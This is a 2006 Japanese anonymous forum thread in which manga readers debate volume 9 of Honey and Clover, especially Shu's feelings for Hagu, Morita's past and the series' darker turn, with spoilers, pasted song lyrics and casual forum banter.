588 :花と名無しさん:2006/07/14(金) 22:52:11 ID:???0
>>587
そんなん漫画読んだら全部わかるじゃん
あたかも自分だけが理解してるかの様に書くな

589 :花と名無しさん:2006/07/14(金) 22:52:58 ID:???0
そうじゃなくて登場人物が、だよ。

590 :花と名無しさん:2006/07/14(金) 22:53:02 ID:???0
あ。ごめ、漫画のキャラのことかorz

591 :花と名無しさん:2006/07/14(金) 23:02:20 ID:???0
なんで森田が書かなくて良い派なんだ!
あいつは100年後も残る作品を作れるのに、とかなんとか
わざわざ森田に言わせてたじゃん。


592 :花と名無しさん:2006/07/14(金) 23:04:54 ID:???0
急に変な欲が出たから…ていうか理由は後で一応出てくるから。
暗澹とした気持ちで10巻を待つが良い。

593 :花と名無しさん:2006/07/14(金) 23:05:29 ID:???0
コミックス派で9巻読んでちょっと鬱になり
でもきっと次の巻あたりで森田さんがはぐ救うのかと気になってこのスレ見に来たら・・・


修がはぐに恋愛感情ってなんですか?
作者キモイよorz

594 :花と名無しさん:2006/07/14(金) 23:08:44 ID:???0
もう10巻は買わないかも…

>>591
馨が、自分は持たざるものだからってどっかいっちゃったからじゃないの?
だから別に才能も無くていいからそばにいてくれる方がうれしいと。


595 :花と名無しさん:2006/07/14(金) 23:12:46 ID:???0
手ガブガブと野宮の説教シーンはよかったな。

596 :花と名無しさん:2006/07/14(金) 23:26:50 ID:5W6qWzr30
9巻のあとはどうなったんですか??

597 :花と名無しさん:2006/07/14(金) 23:28:08 ID:???O
9巻買った!
森田の過去わかってスッキリしたよ!なんか可哀想かなぁ・・・
真山にワラタwwストーカーやろう健在?
はぐが・・・・・・ここで 鬱にw
修チャンかっけええな 尊敬するわさ
山田は・・・・子供だなw


て感想かな

598 :花と名無しさん:2006/07/14(金) 23:35:02 ID:???0
うみのってお父さんキャラが好きだな・・・

599 :花と名無しさん:2006/07/14(金) 23:41:08 ID:???0
>570
同じ。馨兄さん株急上昇した。一番好きだ。

600 :花と名無しさん:2006/07/14(金) 23:51:46 ID:???0
はぐ父は娘を溺愛してたんじゃないのか。

601 :花と名無しさん:2006/07/14(金) 23:51:58 ID:uFg4In4RO
続き気になる
森田と抱き合ったとこで終わってたけど
それから二人は………?

602 :花と名無しさん:2006/07/14(金) 23:53:36 ID:uFg4In4RO
続き気になる
森田と抱き合ったとこで終わってたけど
それから二人は………?

603 :花と名無しさん:2006/07/14(金) 23:54:28 ID:???0
はぐ、あれだけのケガを頭にしていながら
髪の毛は切らなくて済んだんだね...

604 :花と名無しさん:2006/07/14(金) 23:55:43 ID:???0
まぁコミック派の人間はそんな事描かん方がいいよ。
ネタバレで楽しみなくなるぜ、ここは本誌の人間ばっかりだし。

605 :花と名無しさん:2006/07/14(金) 23:59:17 ID:???0
このさきには
暴力的で
鬼のような
展開どもが
あなたを待っています。

そ れ で も 10巻を買いますか?

 はい  <いいえ>


606 :魔法のコトバ:2006/07/15(土) 00:07:33 ID:???0
あふれそうなきもちむりやりかくして
きょうもまたとおくばかりみていた
きみとかたりあったくだらないあれこれ抱きしめてどうにか生きてるけど
魔法のことば
ふたりだけにはわかる
ゆめみるとか
そんなひまもないこのごろ
おもいだしておかしくてうれしくてまたあえるよ
やくそくしなくても
たおれるようにねて
なきながらめざめて
ひとごみのなかでぼそぼそうたう
きみはなにしてるえがおがみたいぞ
ふいりかぶってわがままそらになげた
魔法のことば口にすればみじかく
だけどこうかはすごいものがあることで
誰もしらない誰でもいろあせないそのごのストーリーわけあえるひまで
はなはうつくしくとげもうつくしくねっこもうつくしいはずさ

魔法のことばふたりだけにはわかる夢みるとかそんなひまもないこのごろごろおもいだして
おかしくてうれしくてまたあえるよやくそくしなくてもあえるよあえるよ




607 :花と名無しさん:2006/07/15(土) 00:08:55 ID:???O
そんなひどいなら売っちゃおうかな
9巻すらなんか凹むかんじだったし

608 :花と名無しさん:2006/07/15(土) 00:10:33 ID:???0
>>570
>>599
余計なネタバレだったらスマソだけど
今発売中のコーラスにカオル兄さん出てるよ。
でも10巻発売まで待って読んだ方が泣けるかも。

609 :タイガー&ドラゴン:2006/07/15(土) 00:14:21 ID:???0
とんれるぬければうみがみえるから
そのままどんつきのみかさこうえんであのころみたいにダサいすかジャンきて
おまえまってるからいそいでこいよ俺の話をきけ5分だけでもいいかしたかねの
のことなどどうでもいいからおまえの愛した横須賀の海の
優しさに抱かれて泣けばいいだろ

おれのおれのおれの話をきけ2分だけでもいいおまえだけにほんとうのことをはなすから背中でにらみあう
とらと龍じゃないが俺のなかで俺と俺とが戦う
どす黒くよどんだ横すかのウミに浮かぶ月みたいな電気くらげを



610 :花と名無しさん:2006/07/15(土) 00:15:21 ID:???0
乙女モード前回の切ないファンタジーで、そこが好きだった。
ポエムもファンタジーとあいまって好きだった
山田さんも切なくてかわいかった。
でもゴメン、もう駄目だ
何で保護者に徹しなかったのか・・生臭い感じが・・・
山田さんのこともなんか消化不良だ

611 :花と名無しさん:2006/07/15(土) 00:16:08 ID:???0
本当にあれは泣けた。書店で女子高生の横で
立ち読みしてたんが涙がうるっときた。
やっぱり10巻が最終になっちゃうのかな?


ちなみに俺は男だ!!!!以上。

612 :花と名無しさん:2006/07/15(土) 00:21:34 ID:4cHplnJ40
>>603
頭に怪我すると、傷跡から髪の毛生えてこなくてハゲになるよね。

613 :花と名無しさん:2006/07/15(土) 00:24:52 ID:???0
花本はぐみが、花本ハゲミになるのか…

614 :バンザイ好きでよかった:2006/07/15(土) 00:25:53 ID:???0
いえーいきみを好きでよかったこのままずっとずっと死ぬまではっぴー
バンザイきみにあえてよかったこのままずっとずっつとラらら二人で
つまらないことできみをこまらせておもいだすたびあかくなる
わらっちまうくらいまいにちはただもうすぎてくあっというまにすげすげ幸せな
きぶんのときはかえりみちできみをおもいだすコンビニをうろうろしながら思い出し笑いを
かみころすださいかっこはしたくないとしはとらないように作り笑いなんかしたくない
だからべいべーそばにおいでよいえーいキミを好きでよかった
このままずっとずっつとしぬまではっぴ−ばんざいきみにあえてよかったこのままずっとずっつおららら
ふたりで

いいおんなをみればふりかえるほんとすけべ俺のあたまのなかでもやっぱぐっとくるほどの女はこころのなかにひとりだけ
きざなことばはてれくさいかっこつけづにいこう
いつもふたるいでじゃれてたーいだからべいべーここへおいでよいえーい
きみをすきでよかったこのままずっとずっとしぬまではっぴー
ばんざーいきみにあえてよかったこのままずっとずっとらららふたりで

だからべいべーべいべーそばにそばにそばにおいでよいえーいきみをすきでよかった
このままずっとずっとしぬまではっぴーばんざーいきみにあえてよかったこのままずっとずっと
いえーいきみを好きでよかったこのままずっとずっと死ぬまではっぴー
ばんあざいキミにあえてよかったこのままずっとずっとらららふたりで



615 :花と名無しさん:2006/07/15(土) 00:27:00 ID:???0
ふー寝よ

616 :花と名無しさん:2006/07/15(土) 00:43:46 ID:gjf8FY85O
はぐ、前髪斜め分けにして女っぽさを出していこう作戦か

617 :花と名無しさん:2006/07/15(土) 00:48:55 ID:2JBQQM/9O
まだ9巻発売してなかった・・・。17日発売。

618 :花と名無しさん:2006/07/15(土) 00:50:24 ID:???0
>>617
発売はしてるだろ。

そういう場合は17日販売と言うんだ。

619 :花と名無しさん:2006/07/15(土) 00:52:47 ID:???0
みんなも楽天の予約販売で買ったのかな?
それとも一般書店で買ったのだろーか

620 :花と名無しさん:2006/07/15(土) 00:55:17 ID:???0
普通に本屋で買った
山済みされてたよ

621 :花と名無しさん:2006/07/15(土) 01:02:36 ID:???0
>>620
「やまずみ」じゃない「やまづみ」だ

622 :花と名無しさん:2006/07/15(土) 01:06:15 ID:???O
はぐの唐突なシリアスモノローグとシリアス顔には違和感がw
今までがなさすぎて余計に?
美和子山崎真山理花のあたりが一番は毎回笑える
この4人のベタな会話は好きだな

623 :花と名無しさん:2006/07/15(土) 01:06:24 ID:???O
はぐの親父さんはどうしたの?
どういうことなの?

624 :花と名無しさん:2006/07/15(土) 01:06:42 ID:???0
>>621
2ちゃん初心者さんですね

625 :花と名無しさん:2006/07/15(土) 01:06:51 ID:???0
>>340
貴方は私か?!と思うほど、一緒の意見です。
私も修ちゃんは入院を機に開花?したと思う。
森田×はぐのカップリングは同じように現実味が無く思えていたよ。
しかし、9巻は泣ける・・。
森田兄弟が愛おしい
>>595さんのように、手ガブガブと野宮の説教シーンでジーン・・・
>>597さんの言葉を借りると、やっぱり修ちゃんかっけえ



626 :花と名無しさん:2006/07/15(土) 01:07:20 ID:gjf8FY85O
>586「HG」じゃハードゲイだもんね

しかしまぁ9巻でよかったのは山崎のムシTだけだな

627 :花と名無しさん:2006/07/15(土) 01:08:13 ID:???0
>>624
プギャーw

628 :花と名無しさん:2006/07/15(土) 01:09:15 ID:???0
>美和子山崎真山理花
今となっては余裕綽々の人達ばっかりですからね。

629 :花と名無しさん:2006/07/15(土) 01:12:31 ID:???O
9巻読んだ。
何であれで森田じゃなく修に行くんだ…orz
次読んだら繋がるのかな…

今回描かなくても良いってのが好きだ。
森田も才能あるからこそ言える台詞だと思う。

630 :花と名無しさん:2006/07/15(土) 01:21:04 ID:???0
修の開花は置いといて、はぐの開花は突然すぎやしないかい
作品を作る事で自分を表現することにだけ集中してた間
悶々と将来なぞについて考えて辿り着いた先が
「修ちゃんが側に居てくれれば・・・」ってことなんだろうけど
・・・なんというか入院前まではぐの台詞とか行動に大きな変化が
特になかったから、「え!?何で修と!?」と、読者が戸惑ってしまったのだと思う
ってわかりにくいか。支離滅裂な文章でゴメン。

631 :花と名無しさん:2006/07/15(土) 01:23:12 ID:???0
ハチクロのお砂糖菓子で彩られた、甘く切ない、残酷なファンタジーって感じの世界が好きだったから、
9巻の一気に残酷さが浮き彫りになっていく展開にはマジでビビった。
しかもこの後は臭はぐなのか…orz

632 :花と名無しさん:2006/07/15(土) 01:26:39 ID:???0
コミックス派だったけど続きが気になってこのスレ来てみたけど…











さよなら森田さん

633 :花と名無しさん:2006/07/15(土) 01:27:36 ID:???O
最終話あたりで森田がはぐをモチーフにした作品創りそうな予感(´д`)

634 :花と名無しさん:2006/07/15(土) 01:34:12 ID:???0
はぐをモチーフと聞いて何故か卒業制作のようにマッチョなはぐ像を想像してしまったw

635 :花と名無しさん:2006/07/15(土) 01:39:25 ID:???0
結局ちゃんと大人になれた人にしか青春は甘美なものではないんですよ。
9巻は竹本君がいいな。
修ちゃんの手のアップが色っぽくて生々しくてそれまでと違和感あったけど
そこが面白いと思えた。

636 :花と名無しさん:2006/07/15(土) 02:08:50 ID:???0
あの演出は狙ってるよなー。キスマークっぽいと思った。

637 :花と名無しさん:2006/07/15(土) 02:19:12 ID:???0
修の開花がたとえはぐの入院がキッカケでもやっぱりキモイ
だいたい純粋に親代わりだったのなら
どんなキッカケでも恋愛感情に変わることはないよ
どこかで異性ということを意識してたから恋愛感情に変わりうるんでしょ
そう思って今までの修の行動見てるとやっぱりキモイ

638 :花と名無しさん:2006/07/15(土) 02:25:13 ID:???0
>>636
もっと何かこう凄まじいものがあるけどね。
あれは恋愛フラグでは無いし。

639 :花と名無しさん:2006/07/15(土) 03:32:35 ID:???0
>>511
そんな本人が来ましたよ
意外と、荒れてない。これはこれで…な感じ。

順応性あるんだと自覚しました。

640 :花と名無しさん:2006/07/15(土) 03:34:34 ID:???0
>>639
なんでヨだけカタカナ表記にしたの?

641 :花と名無しさん:2006/07/15(土) 03:40:12 ID:???0
「ファンのこんなはず(の結末)じゃなかったのに、という声に私も影響されて大変なんです〜」



┐(´ー`)┌

642 :花と名無しさん:2006/07/15(土) 04:57:07 ID:???0
頭にケガしたら、手術のためにそらなきゃいけないよね?
あんなに大量に出欠してるから、頭けっこういったはず…

はぐってどっから悩んでた?
たけのこ出発前だっけ。なんかきっかけあった?

643 :花と名無しさん:2006/07/15(土) 05:03:28 ID:???0
森田の母親ってちょっと山田さん似だよな。
ひょっとしてひょっとするとがあり得るのか?

644 :花と名無しさん:2006/07/15(土) 05:20:04 ID:???0
9巻読了
はぐみのモノローグって初めてなのでは?
森田とはぐだけモノローグがなくって、何を考えているかわからないキャラだったのに。

645 :花と名無しさん:2006/07/15(土) 06:28:57 ID:???0
いきなり漫画としての価値をあげたくてシリアスにしたんだろうけど
なら森田のハリウド行き→賞とり
大怪我して車椅子→ウソ
山田の踵落としで転落
とかそういうありえないネタやらなきゃよかったのに
調子よすぎる

646 :花と名無しさん:2006/07/15(土) 06:30:52 ID:???0
>>643
単にウミノが描きわけできないだけ

647 :花と名無しさん:2006/07/15(土) 06:53:05 ID:???O
一週間くらい前に全巻新品まとめ買いした自分orz
ホントorz

648 :花と名無しさん:2006/07/15(土) 06:57:06 ID:???0
アマゾンのハチクロ9巻のページ
(表紙画像見れます)

http://www.amazon.co.jp/gp/product/4088653521/

レビューつけてる人達はコミックス派だね…。
森田とはぐの今後を期待してる人もいるよ。
カワイソス…。

649 :花と名無しさん:2006/07/15(土) 07:01:16 ID:???0
きらめくせかい〜

650 :花と名無しさん:2006/07/15(土) 07:16:56 ID:???O
>>648
つか、森田はぐ展開期待してるやつだけに可哀想って意味が分からん
竹本派だって修派だって色々いるわけだし
なら 竹本とはぐが 9巻の時点の森田はぐみたいな展開になって竹本は捨てられ結局森田か修になったら
竹本はぐ期待してる人達可哀想・・・って言うのか?
それじゃ どうしようもないだろ

651 :花と名無しさん:2006/07/15(土) 07:35:15 ID:???0
>>650
まぁ、正論だけど
そこはあえてスルーしとくが吉ですよ

652 :花と名無しさん:2006/07/15(土) 07:41:51 ID:???0
>>642
>はぐってどっから悩んでた?

CHAPTER.37(6巻収録)あたりから本格的に悩んでます。
(大学4年生になり、卒業後の進路に向き合わねばならなくなったから)

ちなみにこの回の修とはぐ、
互いの本心を押し殺した言動をしてるときもあるので
それがチョットややこしい。

653 :花と名無しさん:2006/07/15(土) 07:54:02 ID:???0
ハチクロって、何かを手に入れる為には何かを諦めなきゃならないって話なんだと思うんだ。
だからどの選択肢を選んでも、常にどこかが欠けた、不完全な状況が続いていく。
そうゆうアンバランスさがハチクロの魅力だと思ってるし、それは今も変わってないと思う。

というか、9巻のchapter55が、意外なくらいグッと来てね。ちょっとウルっと来て自分でビックリした。
雑誌で読んだ時は1話使って過去バナか、くらいに思ってたんだ。
それが先の話を知った今読むと、まったく違うものが見えて。
そうか、森田もはぐも人間なんだ、と。その、当たり前の事が急に胸に沁みてきて。

誰も同意してもらえないかもしれないけど、あえて言う。羽海野チカ先生、あんたスゲエよ。

654 :花と名無しさん:2006/07/15(土) 08:31:01 ID:WgYAsiWL0
>>567
無知って怖いな…
こんなの元ネタ探すの難しいほどの常套句なのに。
ゆとり世代ってこうやって社会を蝕むんだろうね。

655 :花と名無しさん:2006/07/15(土) 08:36:36 ID:WgYAsiWL0
9巻においても修は森田にはぐのそばにいてあげて欲しいってこといってる。
10巻につなぐならイカンだろこれ。
ぎりぎりまで森はぐと信じてた読者を裏切って「前から決めてました」はありえん。
こっからのぼせた修を叩切って森はぐエンドならウミノさん神。

656 :花と名無しさん:2006/07/15(土) 08:40:09 ID:???O
ゆとり世代とか批判ぽく言ってる奴 まだいるんだ・・・・・

657 :花と名無しさん:2006/07/15(土) 08:50:08 ID:???O
>>655
繋ぎ部分抜かして本誌立ち読みしてしまったのでよく分からんが…
9巻でも臭が森田にはぐの傍に居て欲しがってる描写とラストを見て、何故これで森はぐでなく臭はぐ展開に?と不思議に思った。

臭ははぐが森田を好きな事を知ってて、期待してたけど結局自分で面倒みる事にしたって事?

658 :花と名無しさん:2006/07/15(土) 08:50:37 ID:???0
この、「今まで面白かった漫画が突然雰囲気が変わってガッカリ」感、
前にもあったなぁ…って思ったら「まっすぐにいこう」っていう漫画だ。
今までワンコや恋愛話で面白かったのに、
突然主人公の彼氏が養子だったり主人公がいじめにあったり…って
突然変わってしまった。ハチクロもそう。

今までの面白かったギャグやせつない恋愛の話を台無しにするストーリー展開…。
こういうのが描きたかったんならハチクロは終わらせて、他の漫画でやればよかったのに。

659 :花と名無しさん:2006/07/15(土) 08:52:27 ID:???0
>>654
パクリ糾弾してる人の中には、無知ゆとり世代の意見も
かなりあって、呆れることがあるよ…。

「パンを咥えて遅刻遅刻のシーンはエヴァのパクリです!!」
みたいなの

660 :花と名無しさん:2006/07/15(土) 08:54:29 ID:???0
だから
作品がこのまま終わると
決まった訳じゃないのに期待してたの違うからって
てのひら返したように熱狂的ファンだった人が
いらついて大騒ぎしてるだけなんだよ。

661 :花と名無しさん:2006/07/15(土) 08:58:33 ID:???0
ハチクロはオリジナリティあるけど、たまに、え?・・・って
ぐらいにどっかの漫画で見たことあるような場面や台詞が
出てくるんだよな。
キャラにしたってそうだけど。そこら辺は同人出身だし、本人も
0からストーリー作れないって言ってるぐらいだし、いろんな
影響受けてるのは感じる。

よく使われる常套句みたいなもんが大半だけどさ。個性あるぶん、
そういう部分が目立っちゃうわけで

662 :花と名無しさん:2006/07/15(土) 09:01:00 ID:???0
トレスしたんならともかく、「終わりの始まり」なんて言葉でここまで語り合ってしまうこのスレが、
実は結構嫌いじゃなくなってきた今日この頃。

663 :花と名無しさん:2006/07/15(土) 09:18:29 ID:???0
>>662
いや、嫌っていいよ。さよなら。

664 :花と名無しさん:2006/07/15(土) 09:18:46 ID:???O
9巻買うかマジで迷う・・・
これからの展開考えると、切るなら今のうちとは思うんだが
本誌でどうか方向転換をって淡い希望と
ここまで買っといてって気持ちもある
ウミノは何でこんな引く展開に・・・

665 :花と名無しさん:2006/07/15(土) 09:23:26 ID:???0
9巻、話がズンドコ深くなってくね。
>>653サン同様、55話もすごく良かった。森田兄弟…

しかし竹本の葛藤エピソードが自分的にかなりキた。
「(現代)社会」における自立した一個人として、「愛する人と共にいる」ということは
つまりは愛する人と「生活」をするということであり
そこには必ず経済活動が伴う・・・と。
シビアだけど、忘れちゃいけない普遍的なことを語ってる。
愛だけで突っ走ることが善か悪かとかそういう次元の議論でなく、
大切に思う人がいるのなら、その「愛し方」を真剣に考えることが大切なんだ。

竹本の、粋な生き様(悩み様?)にはいつも心を鷲づかみにされる。
(ただ、その描き方が「男は金が無きゃハナシにならん」みたいな、
少々古臭い男性論に終始してしまっている印象を受けてしまう可能性が
無きにしもあらずっぽいトコロが少々モニョ…だけど)

修の突然の恋愛発覚いろいろ言われてんなぁ・・・でも気持ちわかる。
「ラスト近くになって、意外な人物(大概脇キャラ)の主人公への横恋慕が発覚!?」
(そして大概こういうキャラは成就しないw)
みたいな、説明省きまくり(※)ドタバタ強引パターンとか
キャライメージの突然変容(しかもアレな方向に)...とか、正直いってキワドイし。
(自分は慣れてる…てかむしろバッチコーイなので気にならなかったりするが)
担当・編集も、よく許可出したもんだ。

(※あんまりツラツラ説明されてもテンポ崩すだけだから仕方ないけど。脇キャラなら特に。)

666 :花と名無しさん:2006/07/15(土) 09:26:23 ID:???0
普通の同年代の女性相手ならここまで悩む必要薄い(無いとは言わない)けど、
負傷はぐだからな…

667 :花と名無しさん:2006/07/15(土) 09:32:12 ID:???0
はぐさ、ミドリちゃんに
「自然界では真っ先に淘汰されるタイプ」
とか言われてたけど、
フツーに人間社会でもやっていけてないんじゃん・・・。

668 :花と名無しさん:2006/07/15(土) 09:33:06 ID:???0

「 天 才 で す か ら 」 キラーン

669 :花と名無しさん:2006/07/15(土) 09:36:45 ID:???0
天才なのにはぐには金ないのか

670 :花と名無しさん:2006/07/15(土) 09:38:38 ID:???0
山田みたいに比較的早く金になる才能だったら良かったんだがな。

671 :花と名無しさん:2006/07/15(土) 09:46:42 ID:???0
>>668
ちょw花道www

はぐみたいな、あんなに無節操な創作活動する芸術家なんて
あまり聞かないけど、
もし沢山の分野において(死後何百年も残るような)功績を残したとしたら
それこそ第二のレオナルド・ダ・ヴィンチみたいな存在になるのかな。
すごすぎるぜはぐ。
しまいにゃ「建築デザインもやってみたいの」とか言い出したりしてw


672 :花と名無しさん:2006/07/15(土) 09:46:55 ID:???O
今まで描いたのを全部売れば幾らかにはなるのでは…?

673 :花と名無しさん:2006/07/15(土) 09:51:10 ID:???0
海外留学の話は、もちろん奨学金が出るっていうこと。
でも修ちゃんが一緒じゃないから行かないんだよ。
はぐは。

お金はみんなからもらえるけど自立心がないだけ。

674 :花と名無しさん:2006/07/15(土) 10:03:01 ID:???0
絵画って、まとまった金額で売るにはそれなりのルートが必要になるんじゃないの。
山田も第三者から見れば「業界筋にコネ作って売り込んだ」という表現ができる形になっているし。
当人達は、単純に良い物を見つけて作って客に提供しているだけなんだけどな。
この漫画、そういう社会における人脈の重要性を妙にリアルに描いているのが好きだ。
さすが元業界人と言ったところか。

675 :花と名無しさん:2006/07/15(土) 10:07:56 ID:???O
はぐ何か依頼されて何処かに彫刻作って無かったけ?

676 :花と名無しさん:2006/07/15(土) 10:10:08 ID:???0
そういえばあのマッチョ像の金はどうしたんだ?
結構な額になるんじゃないのか?

677 :花と名無しさん:2006/07/15(土) 10:10:57 ID:???0
美術館のロビー用に彫刻作ってたよね

678 :花と名無しさん:2006/07/15(土) 10:13:58 ID:???0
でもその作品の依頼やらなにやらも、
すべて修を介してなんだよね。

修が死んだらマジどうすんの?はぐ

679 :花と名無しさん:2006/07/15(土) 10:18:08 ID:???0
>678

はぐもそのうち、「社会での人と人のつながり大好き」

に、なっていくんだよ。 ウミノさんみたいになww(コミクス9巻後書き参照)


680 :花と名無しさん:2006/07/15(土) 10:21:18 ID:???0

>>679 それスゴク有り得そうw
作者の、はぐへの自己投影っぷりがハンパねぇな。

681 :花と名無しさん:2006/07/15(土) 10:24:33 ID:???0
仮に修が死んで廃人寸前になったはぐを竹本がサルベージしたら、
そのまんま真山と同じパターンじゃんか。

682 :花と名無しさん:2006/07/15(土) 10:26:02 ID:???0
社会での「才能ある」人とのつながりがだいすき

683 :花と名無しさん:2006/07/15(土) 10:27:28 ID:???0
コミックス9巻のあとがきをかいつまんで教えてください

684 :花と名無しさん:2006/07/15(土) 10:30:07 ID:???0
>>682
まあ、それが嫌いな人はニートやるか山に篭って世捨て人やるかしかないがな。


685 :花と名無しさん:2006/07/15(土) 10:34:13 ID:???0
作者が何しようが勝手だけど、作品に一々反映させるのは止めてくれと。

686 :花と名無しさん:2006/07/15(土) 10:35:33 ID:???0
>684
なにその極論

687 :花と名無しさん:2006/07/15(土) 10:37:05 ID:???0
反映させることはあってもいいとは思うが、
やり方に配慮しないとな。
作品にブレを生じさせてしまうようなやり方はいかんよ。


688 :花と名無しさん:2006/07/15(土) 10:39:18 ID:???0
作者は作品にとっての神様だからこそ
あえて自分の好き勝手に手を出しちゃいけないと思う
今までの流れ無視とか

689 :花と名無しさん:2006/07/15(土) 11:04:00 ID:???O
じゃあ どんな内容なら好き勝手じゃないと判断するんだよw

690 :花と名無しさん:2006/07/15(土) 11:08:18 ID:???0
少なくとも多数の人に完全に伏線無視だろって思わせないことじゃないか?
あまりにも不自然すぎて論争おきてるわけだし

691 :花と名無しさん:2006/07/15(土) 11:08:49 ID:???0
>>689
自分好みの展開=Not自分勝手
と、言いたいんじゃないか?

692 :花と名無しさん:2006/07/15(土) 11:20:23 ID:???0
http://movies.yahoo.co.jp/index.html
まあ、一服して
ここで映画に投票でもしる

693 :花と名無しさん:2006/07/15(土) 11:31:57 ID:???0
<chapter.37〜修司のモノローグ>
「自分には見えなかった世界 果たせなかった夢と憧れ オレはそれを
はぐを使って果たそうとしているのではないか?」

<chapter.54〜はぐのモノローグ>
「口にしてはだめ ずっと一緒に戦ってくださいとは……
彼には彼の人生がある 私にはそれを奪う権利はない」

主にこの↑2つのモノローグの解釈の違いによって、
「今の展開はおかしい」派と
「別に合ってるじゃん」派が
生じてるようですね。

さらに修の恋愛感情発覚については
「伏線も説明も無しなんて・・・なに考えてる!?」派と
「別によくね?」派が(ry

694 :花と名無しさん:2006/07/15(土) 11:43:16 ID:???0
コミック派だけど、スレ読んで臭はぐ展開をネタバレ知りつつ9巻買った。
・・・最後の方のはぐを後ろからだっこする臭に生臭い何かを感じたw

でも思ったほど幻滅はしなかった。

695 :花と名無しさん:2006/07/15(土) 11:44:21 ID:???0
はぐって「一人で生きていく」って考えがハナから頭にないのかな。
芸術家には必ず支える人が存在してるの?
(疎くてよくわからない)

恋愛感情があってもなくても
「ずっと一緒に戦って下さい(ry 」だなんて、今まで自分だけの
力で何かを成し遂げたこともないのに口にして、なんでそれが
受け入れられると思えるの?

696 :花と名無しさん:2006/07/15(土) 11:49:17 ID:???0
>>695
>芸術家には必ず支える人が存在してるの?
んなこたぁ無いよ。
ただ、ハティクロファンタジーの中ではそういうことになってる。
「はぐが積極的な創作活動をするには修が必要」ってことに。

はぐ・・・恐ろしい子!

697 :花と名無しさん:2006/07/15(土) 11:56:45 ID:???0
>>693
「別に合ってるじゃん」派「別によくね?」派は
携帯厨と読解力無し厨のみで、少数派。

698 :花と名無しさん:2006/07/15(土) 11:58:29 ID:???0
9巻読んだ。
コミクス派だけどここまでだけ読むと
このスレでは「それが全く感じられない」と言われてた
はぐ→修フラグが立ってるようにも見えた。
でもその後の怒涛の修→→→はぐ描写でかすんでしまったのか??w

逆に森田がはぐにとって、芸術世界の魂の同志なのかなって感じもした。
でもこの後好きなのはやっぱり森田??みたいな描写もあるんだよね?
う〜ん、わからん女、はぐw

全く可能性なしな竹本カワイソス・・・。
自分は竹はぐがいちばん好きだったなあ。

699 :花と名無しさん:2006/07/15(土) 12:14:09 ID:???0
はぐ→(NOT恋愛)→修フラグは
前々から(具体的に言うと6巻から)立ってるよ

>でもその後の怒涛の修→→→はぐ描写でかすんでしまったのか

それもあるだろうし、竹本や森田との絡みの中で、
まるで恋愛の文脈で語られてしまってるように見えるんだよ

>全く可能性なしな竹本カワイソス・・・。
>自分は竹はぐがいちばん好きだったなあ。

激しく同意・・・。


700 :花と名無しさん:2006/07/15(土) 12:56:44 ID:???0
竹本過去形カワイソス。

Chapter61の森田の激白についてはみんなどう感じてるのかな?
自分は、森田が初めて見せた人間らしい弱さに胸がギュッとなったが、
同時にはぐと森田が一緒に歩いていく可能性がここで完全に絶たれたんだとも思った。

森田ははぐを道連れにして逃避しようとしてしまった。
そしてそれははぐにとっては決して受け入れることのできない選択肢だったわけだから。

はぐは森田に一緒に闘って欲しかった。一緒に闘ってくれると信じていた。
でも、それもまた自分のエゴだと気付いてしまった。切ないね。

そしてそれに気付いたとき、修の覚悟の強さにも同時に気付いたってことなんだろうな、と。

701 :花と名無しさん:2006/07/15(土) 13:09:07 ID:???0
本誌での展開に激しくビックリ&ショックで9巻購入どうしようと迷ってたけど
結局購入、意外にも>>653、665さんと同じくすごくよかった。
森田兄弟話は数話分連続でじっくり読むと悲しくてじーんときた・・不思議だ。

竹本・はぐでホノボノ幸せになってほしいなあと思ってたから
9巻読むと真っ先に竹本ハイ消えたー!みたいになっちゃってやっぱカナシス。
でもなんとなく竹本・はぐはナシかと納得いくような展開だったなあ。

>>698
確かに9巻読む限り「はぐ・修=パートナー」展開がなんとなく理解できるね。
とはいえやっぱり自分も修の怒涛の恋愛感情描写にドン引きだったから、
この後(未収録部分)の展開を思い出すと鬱になる・・。

702 :花と名無しさん:2006/07/15(土) 13:11:44 ID:???O
臭あぼんマダー?

703 :花と名無しさん:2006/07/15(土) 13:14:41 ID:???0
9巻読んだ

山崎とダウンを切られた山田の父さんと山田の金柑と牛すじの砂糖煮の被害者がかわいそうだ。

704 :花と名無しさん:2006/07/15(土) 13:18:43 ID:???0
>>700
自分もまさにそういう風にオモタよ。

本誌読んでたときはすっかり忘れてたけど、はぐの
「箱がいっぱいあって、全部開くには時間もなく一人の人生では限りがある、
一緒に戦ってくれる人がいれば・・」みたいな芸術家としての葛藤モノローグも
今後の展開考えるとかなり重要なんだよね。

どんなことをしても一緒に戦っていこうと覚悟した修と違って
森田はそれらの箱を見て見ぬふりして一緒に生きていこうと言ったから、
森田はぐはその時点ではナシになっちゃったんだなあと思った。

705 :花と名無しさん:2006/07/15(土) 13:21:24 ID:???0
スポーツ新聞より
ハチクロ映画公開記事
>原作は同名の人気コミック。
>恋や挫折といった青春時代の普遍的なテーマをみずみずしいタッチで描き、計620万部を突破した。

でも修はぐエンドです(´・ω・`)

706 :花と名無しさん:2006/07/15(土) 13:36:52 ID:???0
>>700 >>704
うーん。そうやって解説されても
****************************************
いままでスーパーマンだった変人森田が
はじめてはぐみの前で人間らしい弱さをみせたら

「あ、この人は、わたしの芸術のために
 一緒に戦ってくれるひとじゃなかったんだ。イラネ。
 やっぱりわたしのたいせつな人は修ちゃんだけ。」

と切り捨てるはぐみ
****************************************
…という図式が出来上がってしまうわけで
やっぱりはぐみってあどけない顔してるくせに心底腐った女だなと
私は呆れてしまうし、
そんなのを描くウミノさんにも情けなくなってしまうよ。

707 :花と名無しさん:2006/07/15(土) 13:41:48 ID:GCscrrM30
700・704の方の意見に同意。653も。
馨の事で、はぐと全く逆の心情に向かってしまった森田。二人の関係は、悲しくも見事な結末だ。

あと修が物凄く叩かれているが、ここまで覚悟を決めた人間に「恋情が入っていると醜い」などと言えるのか。
流れで親心が恋心に変わろうと、それが全てではないと思うのだが。

708 :渚 水帆(阪大アイドル):2006/07/15(土) 13:45:01 ID:U04k627k0
4054.海に行ってきます!! 返信 引用

名前:渚 水帆 日付:7月15日(土) 13時38分
今、明日から出発の海の用意をしています!!

↓海に持って行く浮き輪とナイロンバッグと
 ついでにみんなのリクエストに応えてかなりひどいめがねすっぴんの
 渚を写してみました♪
 これ見てみんな自信つけてね!
http://jpdo.com/a/cgi21/236/joyful.cgi

今、次に読む漫画を探しているので、はちみつとクローバー
ぜひ読んでみますね♪


709 :花と名無しさん:2006/07/15(土) 14:21:22 ID:???0
恋愛関係ない芸術関係のパートナーとして臭を選んだなら納得いくけど
臭が「好きさ!大好きさ!!!111!!1!」はキモイなあ。


710 :花と名無しさん:2006/07/15(土) 14:24:26 ID:???0
話豚切りで悪いが、9巻でまたガンダムのネタを発見してしまったよ。

